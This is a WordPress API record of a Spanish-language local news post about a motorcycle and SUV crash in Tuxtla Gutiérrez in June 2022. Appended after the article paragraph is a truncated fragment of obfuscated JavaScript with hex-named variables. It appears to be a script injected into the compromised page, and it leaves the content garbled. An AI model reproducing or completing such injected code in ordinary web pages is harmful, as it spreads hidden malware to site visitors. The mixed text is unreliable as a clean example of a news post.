{"id":3189,"date":"2022-06-24T23:25:15","date_gmt":"2022-06-24T23:25:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3189"},"modified":"2022-06-24T23:25:16","modified_gmt":"2022-06-24T23:25:16","slug":"automovilista-y-motociclista-protagonizan-fuerte-accidente-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3189","title":{"rendered":"Autom\u00f3vilista y motociclista protagonizan fuerte accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"577\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767-577x1024.jpg\" alt=\"\" class=\"wp-image-3190\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767-577x1024.jpg 577w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767-768x1364.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767-865x1536.jpg 865w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/FB_IMG_1656112901767.jpg 901w\" sizes=\"auto, (max-width: 577px) 100vw, 577px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 24 de Junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista termin\u00f3 estampado contra una camioneta a la altura de la Prolongaci\u00f3n de la Quinta Norte este viernes al mediod\u00eda.Los reportes oficiales informaron que, el joven de 19 a\u00f1os de edad conduc\u00eda una Yamaha de color gris en el carril de Sur a Norte cuando de manera repentina una Captiva de color blanco gir\u00f3 para dar vuelta en U, por lo que no pudo frenar y termin\u00f3 estampado.Por el golpe sali\u00f3 volando y se estrell\u00f3 contra el pavimento.Param\u00e9dicos de la CRM atendieron al herido el cual result\u00f3 con da\u00f1os menores.Afortunadamente en el lugar llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 24 de Junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un motociclista termin\u00f3 estampado contra una camioneta a la altura de la Prolongaci\u00f3n de la Quinta Norte este viernes al mediod\u00eda.Los reportes oficiales informaron que, el joven de 19 a\u00f1os de edad conduc\u00eda una Yamaha de color gris en el carril de Sur a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3190,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3189","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3189"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3189\/revisions"}],"predecessor-version":[{"id":3191,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3189\/revisions\/3191"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3190"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}